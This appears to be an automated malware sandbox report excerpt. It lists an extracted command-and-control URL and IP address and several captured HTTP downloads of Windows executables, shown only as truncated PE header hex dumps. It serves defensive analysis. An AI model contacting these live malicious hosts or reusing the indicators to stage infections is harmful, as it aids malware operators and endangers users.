                        Source: Malware configuration extractorURLs: http://85.28.47.4/920475a59bac849d.php
                        Source: Malware configuration extractorIPs: 77.91.77.82
                        Source: Malware configuration extractorIPs: 77.91.77.82
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 06:26:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
